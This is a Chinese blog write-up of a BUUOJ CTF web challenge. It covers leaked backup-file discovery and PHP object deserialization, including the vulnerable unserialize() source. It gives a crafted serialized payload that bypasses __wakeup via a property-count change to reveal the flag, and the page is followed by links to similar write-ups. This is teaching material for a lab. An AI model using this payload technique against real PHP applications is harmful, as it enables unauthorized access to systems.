[WP-Buuoj-极客大挑战2019-信息泄露/反序列化]PHP

最新推荐文章于 2022-06-30 21:55:14 发布
最新推荐文章于 2022-06-30 21:55:14 发布
阅读量237 收藏 1
点赞数 2
分类专栏: # 凌晨四点起床刷题 # Web安全 # Write Up 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/114767341
版权

在这里插入图片描述

进入网页,根据提示,估计网站存在备份文件存在任意下载漏洞

尝试获取源码
常见的网站源码备份文件后缀
.rar/.zip/.7z/.tar/.tar.gz/.bak/.swp/.txt/.html/
常见的网站源码备份文件名
web/website/backup/back/www/wwwroot/temp

经过尝试www.zip为该备份,未删除或设置权限,可进行下载操作。

tip:也可以尝试使用御剑disearch进行扫描

打开压缩包,得到网站源码

分析源码

源码核心为2部分

  • index.php
  • class.php
-------非重点内容-----------
--------------------------
    <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>
-------非重点内容-----------
--------------------------

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

考察点清晰:反序列化。

思路:利用反序列化对私有变量进行更改,以使析构函数满足条件,输出flag。

关键点

  • 构造能对构造函数利用的Name序列化对象
  • 绕过__wakeup
  • 对Name序列化私有变量做特殊处理
解题

构造序列化

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

}

$a = new Name(admin,100);
echo serialize($a);
echo urlencode('');
// O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
// O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
?>

将变量数改为3,即可导致wakeup无法执行,直接跳过。

private变量前带有空格,需要将空字符改为%00,防止被url编码错误编码为空格。

Payload

xx/index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述

补充

在序列化对象中,

public变量名前无特殊标识,private中包含空字符[空字符],protected中包含[空字符]*[空字符]

%00Huihe%00name %00为不可打印字符,即空字符
%00%2A%00age %2A 为 *

車鈊
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
modern-login:白标和现代的wp-login.php
02-05
现代登录 这里生活着一个简单的mu-plugin用于whitelabel和现代wp-login.php 。 没有管理面板,没有膨胀-只是一个简单的过滤器,可以选择使用调色板自定义CSS属性。要求 > = 7.1.3安装基岩通过Composer安装: $ ...
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
BUU CODE REVIEW 11序列
weixin_50339832的博客
09-09 580
序列漏洞 进入靶机是这个样子 首先进行分析后 看最后一行那个函数unserialize,判断序列 然后用post方法传obj变量,利用序列漏洞 这里要进行一个判断,就是buu类中的correct和input内容强相等,这里利用传引用的方法 到http://c.runoob.com/compile/1运行下列代码 <?php class BUU { public $correct=""; public $input=""; } $obj = new BUU...
BUUOJ reverse SimpleRev (爆破)
weixin_30794499的博客
08-29 495
SimpleRev SimpleRev(flag需加上flag{}再提交) 注意:得到的 flag 请包上 flag{} 提交 拖到ida 找到关键函数: unsigned __int64 Decry() { char v1; // [rsp+Fh] [rbp-51h] int v2; // [rsp+10h] [rbp-50h] int v3; // [r...
buuctf php(扫描网站备份文件和序列漏洞)
qq_44111753的博客
12-30 1084
知识点: 1、扫描网站备份文件 别人写的备份文件url生成字典脚本 import os import os.path import requests from urllib.parse import unquote suffixList = ['.rar','.zip','.tar','.tar.gz'] keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databa
BUUCTF_web_禁止套娃,wp
weixin_54227009的博客
05-10 151
打开靶机之后,f12并没有发现什么, 用dirsearch扫描了一波目录 也并没有发现什么有用的信息 然后GitHack尝试了一下,发现是源码泄露 获得源代码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'...
BUUCTF之[挑战 2019]PHP ------ PHP序列/序列
weixin_44632787的博客
07-27 424
BUUCTF之[挑战 2019]PHP ------ PHP序列/序列 提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。 首先是flag.php,这里面虽然有flag。但是这个flag是假的。 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 然后就是index.php,你打开它后会发现它是WEB界面的那个代码。 最后,想要拿到真正的flag。需要从cla
wordpress合理利用wp-config.php文件小功能
09-28
wordpress很多文件和文件夹,虽然经常提到,但我们基本上不会去修改这些文件,绝大部分操作基本上都是在WordPress主题和WordPress插件。但是有一个文件,我们会是不是的修改一下,这个文件就是wp-config.php,当然,...
WordPress配置文件wp-config.php详解
09-29
主要介绍了WordPress配置文件wp-config.php详解,包含很多控制Wordpress的技巧,需要的朋友可以参考下
wordpress之wp-settings.php
10-30
wordpress之wp-settings.php
[原题复现+审计][0CTF 2016] WEB piapiapia(序列、数组绕过)[改变序列长度,导致序列漏洞]...
笑花大王
03-02 1264
简介 原题复现: 考察知识点:序列、数组绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 漏洞学习 数组绕过 1.1 url传递数组当我们要向服务器传递数组时,我们可以通过 http://127.0.0.1/index.php?a[]=hello&a[]=world 来传递,这...
【BUUCTF】basic web BUU CODE REVIEW 1 1(序列漏洞,传引用判断相等)
weixin_45844670的博客
10-12 3301
<?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/10/6 * Time: 8:04 PM */ highlight_file(__FILE__); class BUU { public $correct = ""; public $input = ""; public function __destruct() { try { $this->corre
关于phar序列——BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
silence1_的博客
10-22 2675
关于phar序列——[CISCN2019 华北赛区 Day1 Web1]Dropbox 先看看phar是啥https://blog.csdn.net/u011474028/article/details/54973571 简单的说,phar就是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// ,php://等类似,也是一种流包装器...
BUUCTF刷题记录[HFCTF2020]BabyUpload——涉及session序列
u013119911的博客
06-30 1534
点开就是源代码,直接进行代码审计
【CTF】buuctf web(三)——PHP序列序列
m0_52923241的博客
08-04 1738
[挑战 2019]PHP 题目类型:序列序列 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
BUUCTF 荷兰宽带数据泄露
葜。的博客
01-11 6415
下载附件得到一个conf.bin文件,路由器信息数据,一般包含账号密码。题目并没有提示flag是什么,猜测是账号或者密码加上格式为最终flag。 用RouterPassView查看后,搜索username或者password, 最后发现是用户名为flag,加上格式提交即可。 ...
[WEB/nodejs]Nodejs知识入门和子进程
車鈊的博客
04-06 4381
文章目录入门内容Nodejs初步解构赋值事件绑定1.DOM绑定2.在JS绑定3. 绑定事件监听函数Callback回调函数子进程模块_函数child_process()参考链接 入门内容 Nodejs初步 Nodejs是在服务器端运行的JS代码,跨平台JS的运行环境, 采用V8引擎运行源代码, 利用事件驱动、非阻塞、异步I/O模型等来提高运行的性能。 使用多进程是扩展一个 Node 应用最好的方式, 被设计用来通过很多节点创建分布式应用, 这也是为什么被命名为 Node。 解构赋值 类似于解包,将对象或者数
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 2581
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
php逐行提取txt文字wp-content/plugins/ai-post/1.txt
最新发布
06-11
同样地,使用 PHP 的 fgets() 函数,可以逐行读取 wp-content/plugins/ai-post/1.txt 文件中的内容。下面是一个参考示例代码: ```php $file = fopen($_SERVER["DOCUMENT_ROOT"] . "/wp-content/plugins/ai-post/1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值